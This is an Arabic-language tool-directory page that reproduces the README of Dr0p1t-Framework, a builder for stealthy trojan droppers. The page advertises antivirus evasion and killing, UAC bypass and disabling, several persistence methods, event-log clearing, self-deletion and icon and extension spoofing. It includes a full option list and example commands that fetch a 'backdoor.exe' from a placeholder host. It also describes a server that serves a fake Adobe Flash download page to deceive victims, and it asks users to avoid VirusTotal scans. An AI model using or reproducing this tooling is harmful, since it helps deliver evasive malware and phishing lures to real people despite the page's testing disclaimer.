Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Dr0p1t-Framework — إطار عمل يقوم بإنشاء أداة تحميل خفية متقدمة تتجاوز معظم برامج مكافحة الفيروسات وتحتوي على العديد من الحيل. | Kitploit
أدوات/GitHubGitHub/d4vinci/dr0p1t-framework
تصعيد الامتيازاتتوليد الحمولةآليات الاستمراريةالاستغلالالتهرب من IDS/IPSالتحقيق الجنائي الرقميالتصيد الاحتياليتحليل البرمجيات الخبيثةالقيادة والسيطرةالهندسة الاجتماعيةتطوير الحمولاتمكافحة الروبوتات
1.5k387منذ 7 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
Archived
GitHubd4vinci/dr0p1t-framework

Dr0p1t-Framework

إطار عمل يقوم بإنشاء أداة تحميل خفية متقدمة تتجاوز معظم برامج مكافحة الفيروسات وتحتوي على العديد من الحيل.

عرض المستودع

غير مُصان حاليًا (انتظر الإصدار التالي)


Dr0p1t-Framework n0where best cybersecurity tools Python 3.5 Python 2.7 Build Status

هل سمعت يومًا عن قاذفات أحصنة طروادة؟ باختصار، القاذف هو نوع من البرامج الضارة التي تقوم بتحميل برامج ضارة أخرى، ويمنحك Dr0p1t فرصة إنشاء قاذف خفي يتجاوز معظم برامج مكافحة الفيروسات ولديه الكثير من الحيل (ثق بي :D) ;)

الميزات

+ خصائص الملف القابل للتنفيذ المُنشأ:

  • حجم الملف القابل للتنفيذ أصغر مقارنة بالقاذفات الأخرى المُنشأة بنفس الطريقة.
  • تحميل الملف القابل للتنفيذ على النظام المستهدف وتشغيله بصمت.
  • وظيفة التدمير الذاتي حيث يقوم القاذف بقتل وحذف نفسه بعد الانتهاء من عمله.
  • الهروب من التحليل الجنائي للقرص الصلب عن طريق جعل جميع الملفات التي ينشئها القاذف، وكذلك يقوم القاذف بتنظيف محتواه قبل الحذف.
  • مسح سجل الأحداث بعد الانتهاء.

+ خصائص الإطار:

  • يعمل مع ويندوز ولينكس ويدعم الآن OSX (شكرًا لـ @sm4sh3r)
  • ميزة خادم Dr0p1t-Server (إصدار تجريبي) حتى تتمكن الآن من العمل من المتصفح انظر كيفية العمل مع خادم Dr0p1t
  • يحتوي خادم Dr0p1t-Server على خيار احتيال (إصدار تجريبي) انظر كيفية العمل مع خادم Dr0p1t

+ الوحدات:

  • البحث عن برامج مكافحة الفيروسات وقتلها قبل تشغيل البرنامج الضار.
  • القدرة على تعطيل UAC.
  • القدرة على تشغيل برنامجك الضار كمسؤول.
  • تزييف كامل عن طريق تزييف أيقونة الملف وامتداده إلى أي شيء تريده.
  • دعم ملفات ZIP بحيث يمكنك ضغط الملف القابل للتنفيذ إلى ملف zip قبل التحميل.
  • تشغيل ملف مخصص (batch|powershell|vbs) اخترته قبل تشغيل الملف القابل للتنفيذ.
  • عند تشغيل نصوص باورشيل، يمكنه تجاوز سياسة التنفيذ.
  • استخدام UPX لضغط القاذف بعد إنشائه.

+ وحدات الثبات:

  • إضافة الملف القابل للتنفيذ بعد تحميله إلى بدء التشغيل.
  • إضافة الملف القابل للتنفيذ بعد تحميله إلى جدولة المهام (UAC لا يهم).
  • إضافة ملفك إلى ملف تعريف المستخدم في باورشيل بحيث يتم تحميل وتشغيل ملفك في كل مرة يعمل فيها powershell.exe إذا لم يكن موجودًا.

لقطات الشاشة

على ويندوز

شاهد المزيد

على لينكس (Kali Linux)

شاهد المزيد

على OSX

لا يزال غير مختبر بالكامل! نحتاج إلى بعض المساهمين والمختبرين 😄

قائمة المساعدة

root@kitploit:~
Usage: Dr0p1t.py Malware_Url [Options]

options:
-h, --help      show this help message and exit
-s              Add your malware to startup (Persistence)
-t              Add your malware to task scheduler (Persistence)
-a              Add your link to powershell user profile (Persistence)
-k              Kill antivirus process before running your malware.
-b              Run this batch script before running your malware. Check scripts folder
-p              Run this powershell script before running your malware. Check scripts folder
-v              Run this vbs script before running your malware. Check scripts folder
--runas         Bypass UAC and run your malware as admin
--spoof         Spoof the final file to an extension you choose.
--zip           Tell Dr0p1t that the malware in the link is compressed as zip
--upx           Use UPX to compress the final file.
--nouac         Try to disable UAC on victim device
-i              Use icon to the final file. Check icons folder.
--noclearevent  Tell the framework to not clear the event logs on target machine after finish.
--nocompile     Tell the framework to not compile the final file.
--only32        Download your malware for 32 bit devices only
--only64        Download your malware for 64 bit devices only
-q              Stay quite ( no banner )
-u              Check for updates
-nd             Display less output information

أمثلة

root@kitploit:~
./Dr0p1t.py Malware_Url [Options]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip

المتطلبات الأساسية

  • بايثون 2 أو بايثون 3.

الإصدار الموصى به لبايثون 2 هو 2.7.x، والإصدار الموصى به لبايثون 3 هو 3.5.x ولا تستخدم 3.6 لأنه غير مدعوم بعد من قبل PyInstaller

التبعيات المطلوبة للينكس

  • apt
  • سيتم تثبيت البعض الآخر من ملف install.sh

ملاحظة: يجب أن يكون لديك صلاحيات الجذر

التبعيات المطلوبة لويندوز

  • pip
  • الوحدات الموجودة في ملف windows_requirements.txt

التثبيت

توجد قائمة هنا لجميع الفيديوهات الرسمية لتثبيت واستخدام Dr0p1t قائمة تشغيل

  • على لينكس
root@kitploit:~
git clone https://github.com/D4Vinci/Dr0p1t-Framework.git
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
sudo chmod +x install.sh
./install.sh
python Dr0p1t.py
  • على ويندوز (بعد تحميل الملف المضغوط ZIP وفك ضغطه)
root@kitploit:~
cd Dr0p1t-Framework-master
python -m pip install -r windows_requirements.txt
python Dr0p1t.py

ملاحظة: في بايثون 2.7 لا يوجد pip لذا ثبته أولاً من script get-pip.py [ابحث في جوجل]

تم اختباره على:

  • Kali Linux Rolling
  • Ubuntu 14.04-16.04 LTS
  • Windows 10/8.1/8

العمل مع Dr0p1t-Server

ملاحظة: الخادم لا يزال في الإصدار التجريبي ولديه الكثير من الميزات التي سيتم إضافتها وأيضًا تصميم أفضل [نحتاج إلى مصمم للمساهمة :D]

المتطلبات المسبقة

  • اتصال إنترنت مستقر.
  • المنفذ 5000 غير مستخدم وجدار الحماية مُهيأ لعدم منع الاتصالات منه

التثبيت وتشغيل الخادم

على لينكس وويندوز الأمر نفسه بعد تثبيت Dr0p1t عن طريق اتباع الخطوات المذكورة أعلاه، قم بتثبيت الوحدات في ملف server_requirements.txt باستخدام pip كالتالي:

root@kitploit:~
python -m pip install -r server_requirements.txt

الآن لنقم بتشغيل سكريبت الخادم الخاص بنا:

root@kitploit:~
python Dr0p1t_Server.py

بعد تشغيل سكريبت الخادم، سيبدأ في الاستماع إلى جميع الاتصالات الواردة إلى المنفذ 5000 باستخدام flask.

الآن لاستخدام الخادم من جهازك، افتح في المتصفح 127.0.0.1:5000 أو [عنوان IP الخاص بك]:5000.

لفتحه من أجهزة أخرى في الشبكة المحلية، افتح [عنوان IP المحلي الخاص بك]:5000 ومن أجهزة أخرى في الشبكة الواسعة افتح [عنوان IP العام الخاص بك]:5000 ولكن تأكد أولاً من تكوين جهاز التوجيه لتوجيه اتصالات المنفذ 5000 إليك.

بعد فتح صفحة الخادم، سترى موقعًا بسيطًا بتصميم بسيط يطلب منك البيانات المطلوبة انظر لقطات شاشة الخادم

ثم أرسل البيانات، وسيتم التحقق منها عبر عدة عمليات ثم سيتم إنشاء ملف exe وسيتم إعادة توجيهك إلى صفحة تخبرك برابط الاحتيال.

بعد إدخال الرابط، سترى صفحة احتيال لتنزيل القاذف، وهي افتراضيًا صفحة تنزيل Adobe Flash. لاستبدال صفحة الاحتيال بصفحتك الخاصة، استبدل محتوى ملف "Scam.html" بمحتواك ولكن تذكر المتغيرات (لا تقم بإزالتها).

لقطات شاشة الخادم

شاهد المزيد لويندوز شاهد المزيد للينكس

لا تقم بالمسح للتوزيع (يرجى عدم المسح باستخدام VirusTotal :3)

المهام المتبقية تحقق من هذا الرابط

الاتصال

  • تويتر

التبرع

إذا كانت هذه الأداة مفيدة لك، فلا تتردد في شكري بشراء فنجان قهوة لي :)

Coffee

إخلاء المسؤولية

إطار Dr0p1t غير مسؤول عن سوء الاستخدام أو الاستخدام لأغراض غير قانونية. استخدمه فقط لأغراض الاختبار الأمني أو التعليم!!!

يُقبل نسخ كود من هذا الإطار أو استخدامه في أداة أخرى طالما تذكر من أين حصلت عليه 😄

طلبات السحب مرحب بها دائمًا :D

تنزيل الأداة